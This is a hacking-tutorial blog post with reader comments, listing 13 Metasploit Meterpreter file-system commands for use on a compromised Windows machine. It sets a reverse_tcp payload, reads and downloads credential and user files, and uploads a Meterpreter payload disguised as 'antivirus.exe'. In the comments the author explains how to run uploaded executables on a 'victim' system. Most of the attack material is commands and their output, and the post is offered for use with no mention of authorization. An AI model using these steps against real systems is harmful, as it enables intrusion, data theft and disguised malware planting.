• +
13 Metasploit Meterpreter File System Command You Should Know

13 Metasploit Meterpreter File System Command You Should Know

Bookmark

Type : Tutorial

Level : Easy

You can get your meterpreter command after you have successfully compromise a system via an exploit and set up your payload to meterpreter command.

set payload windows/meterpreter/reverse_tcp

 

13 Metasploit Meterpreter File System Command You Should Know:

1. cat

The cat command displays the contents of a single file. As of the time of this writing, the command will throw an error when trying to read an emtpy file.

meterpreter > cat passwords.txt
harleydavidson
password
kidsbirthday

 

2. cd

To change directory the cd command is used.

The command will accept both back and forward slashes somewhat interchangeably, though using a forward slash seems to work more frequently. "." and ".." are used to access the current and parent directory, respectively, and double-quotes can be used to access directories with spaces in the names.

meterpreter > pwd
C:\
meterpreter > cd /"Program Files"/"Internet Explorer"
meterpreter > pwd
C:\Program Files\Internet Explorer
meterpreter > cd ../../"documents and settings"/Administrator/Desktop/
C:\Documents and Settings\Administrator\Desktop

 

3. download

When we need to retrieve a file from the target we use the download command, which transfers the specified file into our local working directory. In the event that we need to recursively download an entire directory, we use the download -r command.

meterpreter > download users.txt
[*] downloading: users.txt -> users.txt
[*] downloaded : users.txt -> users.txt

 

4. edit

To edit a file using our default text editor we use the edit command. Behind the scenes, Meterpreter will download a copy of the file to a temp directory, then upload the new file when the edit is complete.

meterpreter > edit users.txt

 

5. getlwd

We can show the current working directory on our local machine by using getlwd (get local working directory), or by using the alias lpwd (local print working directory).

meterpreter > getlwd
/root/Desktop/metasploit
meterpreter > lpwd
/root/Desktop/metasploit

 

6. getwd

We can show the current working directory on the exploited machine by using getwd (get working directory), or by using the alias pwd (print working directory).

meterpreter > getwd
C:\Program Files\Internet Explorer
meterpreter > pwd
C:\Program Files\Internet Explorer

 

7. lcd

To change the local directory we use the lcd command.

The command only accepts arguments in the same way as your operating system's cd command, so refer to your system's documentation for specific instructions. The following example shows lcd on a Linux system.

meterpreter > lpwd
/root/Desktop/metasploit
meterpreter > lcd ../..
meterpreter > lpwd
/root/myusername
meterpreter > lcd /home/andrer/Desktop/metasploit
meterpreter > lpwd
/home/myusername/Desktop/metasploit

8. lpwd

We can show the current working directory on our local machine by using lpwd (local print working directory), or by using the alias getlwd (get local working directory).

meterpreter > lpwd
/home/myusername/Desktop/metasploit
meterpreter > getlwd
/home/myusername/Desktop/metasploit

 

9. ls

We can see both the current working directory and a detailed listing of files in that directory by using the ls command. File listings are given in a format similar to the GNU ls program.

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop\shared
===============================================================

Mode              Size   Type  Last modified                   Name               
----              ----   ----  -------------                   ----               
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .                  
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..                 
100777/rwxrwxrwx  14965  fil   Wed Dec 31 18:00:00 -0600 1969  meter-443.exe  
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  u3

 

10. mkdir

We use mkdir to make a new directory on the target system.

meterpreter > mkdir antivirus-update
Creating directory: antivirus-update
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
================================================

Mode              Size     Type  Last modified                   Name               
----              ----     ----  -------------                   ----               
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  .                  
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  ..                 
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  antivirus-update   
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  shared             
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  working

 

11. pwd

We can show the current working directory on our local machine by using pwd ( print working directory), or by using the alias getwd (get working directory).

meterpreter > pwd
C:\Program Files\Internet Explorer
meterpreter > getwd
C:\Program Files\Internet Explorer

 

12. rmdir

We can remove an empty directory with the rmdir command. The command will throw an error if the directory is not empty.

meterpreter > rmdir antivirus-update
Removing directory: antivirus-update

13. upload

To send a file to the target system we use the upload command, using the -r switch to recursively upload directories and their contents. In the following example we are uploading a falsely named Meterpreter payload.

meterpreter > upload antivirus.exe
[*] uploading  : antivirus.exe -> antivirus.exe
[*] uploaded   : antivirus.exe -> antivirus.exe
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop\antivirus-update
=================================================================

Mode              Size   Type  Last modified                   Name           
----              ----   ----  -------------                   ----           
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .              
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..             
100777/rwxrwxrwx  10912  fil   Wed Dec 31 18:00:00 -0600 1969  antivirus.exe

 

Read more : metasploit wiki

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • tarish

    nice work dude…tnx

    • v4L

      #tarish
      you’re welcome ๐Ÿ™‚

  • Pingback: How to get Files From Victim Using Backtrack + Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • Pingback: 4 Steps Hacking Windows via Golden FTP Server Pass Stack Buffer Overflow | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • Pingback: 4 Steps How to Hacking Windows 7 SP1 via Easy Chat Server 2.5 (zeroday) | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • Charles

    mkdir…  the -p option is ignored. How do I create a complex structure that probably doesn't exist? For instance, in unix and dos this works: mkdir -p c:/blue/berry/pancakes even if /blue doesn't exist.

    • v4L

      #Charles
      I haven’t try it…because afaik the meterpreter is different with DOS / Unix Console, if you want the functional ability of DOS/Unix Console, you should run shell command from your meterpreter console.

  • Charles

    This is nice, but there are some serious commands that meterpreter is missing. del *.*? Can't be done. rmdir /S /Q (to delete an entire tree and everything in it recursively)? Not there. What's more, execute cannot be used to issue either of these dos commands, because they're part of the shell and aren't actual programs that can be executed. Sure, I can open a shell, but if I'm using the RPC to send meterpreter commands remotely, using an interactive shell is programatically a nightmare. It's easier to create a simple batch file, upload it, and execute it than it is to delete a directory and everything that's in it. And that is ridiculous. There has GOT to be an easier way.
     
    Charles.

  • Pingback: Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday) | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • Gabriel

    Hello i have a problem when i want to download in meterpreter he say this: stdapi_fs_stat operation failed the system cannot find the file specified how can i fix the problem. Thank you

    • v4L

      #Gabriel
      That’s mean the system didn’t find the file

  • hodha

    how can i execute a file after upload ‘.exe’ file into victim system…..

    • v4L

      #hodha
      execute it using shell.
      If you’re on meterpreter, you need to change to shell and go to upload directory and just execute the EXE

      • hodha

        thank u sir
        but…
        by using shell command i can upload and download files….after uploading particular .EXE files i want run on that victim machine……for that one which command i have to use …?

        • v4L

          #hodha
          you upload the file using meterpreter upload command isn’t it?
          meterpreter> upload NOTEPAD.exe
          and then you go to shell from meterpreter :
          meterpreter> shell
          and you will get :
          C:\WINDOWS>NOTEPAD.exe
          it will execute the exe

        • hodha

          thank u very much Sir……

  • jogi

    i want a commands of meterpreter to download and upload data from victim computer .

    thnx for sharing ur knowledge . ๐Ÿ™‚

    • v4L

      #jogi
      you can view it above ๐Ÿ™‚

    • gabi

      Is like this

      meterpreter> download d:\\folder name

      this is the command not download like valentino answer is rong
      what i don t know is how to download folders with two words like : picture summer
      sorry for my broken english